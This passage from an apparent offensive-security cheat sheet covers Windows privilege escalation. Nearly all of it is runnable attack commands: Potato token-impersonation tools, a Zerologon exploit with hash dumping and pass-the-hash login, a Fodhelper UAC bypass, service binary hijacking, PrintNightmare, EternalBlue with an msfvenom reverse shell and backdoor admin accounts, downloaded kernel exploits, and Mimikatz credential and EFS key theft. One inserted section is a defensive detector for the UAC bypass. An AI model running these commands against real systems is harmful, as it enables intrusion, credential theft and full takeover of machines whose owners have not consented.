.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337  
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337  

## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both  
-p <program>: program to launch
-l <port>: COM server listen port

# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

03.2 RoguePotato (No more JuicyPotato? Old story, welcome RoguePotato!)

## ------------------| Run Chisel to bind port 9999
chisel server --reverse --port 1337 ## On our (attacker) machine
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999 ## On the target machine

## ------------------| Run socat to catch 135 
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## From Our end

## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or 
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999

03.3 MultiPotato

## ------------------| Download
### Bit 64
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe 
### Bit 32
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe     

## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser

## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

03.4 PrintSpoofer

# !!! Microsoft Visual C++ Redistributable must be installed

.\PrintSpoofer.exe -i -c "C:\\<PATH>\shell.exe"

03.5 Zerologon | CVE 2020-1472

git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179

# If the exploit completes,
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179

# Now you can login with this 
# '$' is used for machine account
impacket-psexec Administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0  

03.6 Fodhelper.exe - UAC Bypass

## ------------------| CMD
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ         
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f                 
C:\Windows\System32\fodhelper.exe

## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

## ------------------| Remove
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
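
Added defender-side example, not from the original page: hunt every loaded user hive for the ms-settings handler that the Fodhelper bypass above plants, and read the UAC policy values that decide whether fodhelper.exe auto-elevates at all. The function names are mine; the registry locations are the real ones.

```powershell
# Added example, not part of the original page: detect planted ms-settings
# handlers and report the UAC auto-elevation setting. Read-only unless
# -Remove is given. Function names are my own.
function ConvertTo-AccountName {
    param([string]$Sid)
    try { (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid }
}

function Get-UacPolicy {
    $p = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        # 2 = "Always notify": auto-elevation is off, so fodhelper prompts instead of silently elevating
        SilentAutoElevate          = ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -ne 2)
    }
}

function Find-MsSettingsHandler {
    param([switch]$Remove)
    # HKCU\Software\Classes is a merged view: the key can live in HKU\<SID> or in
    # the user's UsrClass.dat hive (HKU\<SID>_Classes). Check both for every
    # loaded hive, not just the current user's HKCU.
    $hives = Get-ChildItem -Path Registry::HKEY_USERS | Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }
    foreach ($h in $hives) {
        $sid = $h.PSChildName
        foreach ($root in "HKEY_USERS\$sid\Software\Classes", "HKEY_USERS\${sid}_Classes") {
            $key = "Registry::$root\ms-settings\shell\open\command"
            if (-not (Test-Path -LiteralPath $key)) { continue }
            $p = Get-ItemProperty -LiteralPath $key
            [pscustomobject]@{
                User            = ConvertTo-AccountName $sid
                Key             = $key
                Command         = $p.'(default)'
                DelegateExecute = $p.DelegateExecute
            }
            if ($Remove) { Remove-Item -LiteralPath "Registry::$root\ms-settings" -Recurse -Force }
        }
    }
}

Get-UacPolicy | Format-List
Find-MsSettingsHandler | Format-List    # add -Remove to delete planted keys
```

Nothing legitimate creates ms-settings\shell\open\command under a user's Classes hive, so any hit is an indicator. For continuous coverage, a registry SACL on that path (Security event 4657) or Sysmon events 12/13 on the same path catches the New-Item/New-ItemProperty step at the moment it happens, and ConsentPromptBehaviorAdmin = 2 removes the silent elevation the technique relies on.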

03.7 Serviio Insecure File Permissions

## ------------------| Enumeration
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio          
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)

## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio 
## or 
wmic service where caption="Serviio" get name, caption, state,startmode
whoami /priv | findstr SeShutdownPrivilege ## Disabled OK
shutdown /r /t 0 

03.8 PrintNightmare

## ------------------| Verify vulnerability
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN 

## ------------------| Download and execute
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare 
## If you get any kind of errors like ExecutionPolicy; try with evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>  -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare

## Then use psexec to login with new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>

03.9 EternalBlue (MS17-010)

## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP

## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # This will get an error; that's fine
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe

## ------------------| Method I
python send_and_execute.py <IP> rev.exe

## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>

03.10 Windows-Exploit-Suggester WES-NG

## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py

## ------------------| Download latest definitions
./wes.py --update
./wes.py -u

## ------------------| Download latest version of WES-NG
./wes.py --update-wes

## ------------------| Determine vulnerabilities
./wes.py systeminfo.txt

## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt

## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv

## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017

## ------------------| Determine vulnerabilities, filtering out KBs published before the most recent installed KB
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d

## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip

## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash

## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"

## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical

## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup

03.11 Windows Kernel Exploits

Download all the binary files from: https://github.com/SecWiki/windows-kernel-exploits

Microsoft Windows - Local Privilege Escalation (MS15-051)

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip

USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)

## ------------------| Information
# Date             - 07th March 2017
# Discovered by    - Parvez Anwar (@parvezghh)
# Vendor Homepage  - http://desowin.org/usbpcap/ 
# Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version   - 1.1.0.0 - USBPcap.sys
# Tested on OS     - 32bit Windows 7 SP1 
# Vendor fix url   - not yet
# Fixed Version    - 0day
# Fixed driver ver - 0day

## ------------------| Check for a vulnerable version
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"

## ------------------| Exploit
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc.exe -o exploit.exe exploit.c
./exploit.exe

04. Mimikatz

  • Dump all users' NTLM hashes from LSASS

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out 
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out       

## ------------------| If you have an LSASS minidump (or Rekall) file
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
  • Set password for account

.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"

  • Decrypt EFS files

## ------------------| Get the file's certificate thumbprint
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## You can also get it with the following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name  

## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"    
## Download the *.der file to your machine.

## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"     

## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.

## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx       
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot

## ------------------| Data access
type "c:\users\file.txt"
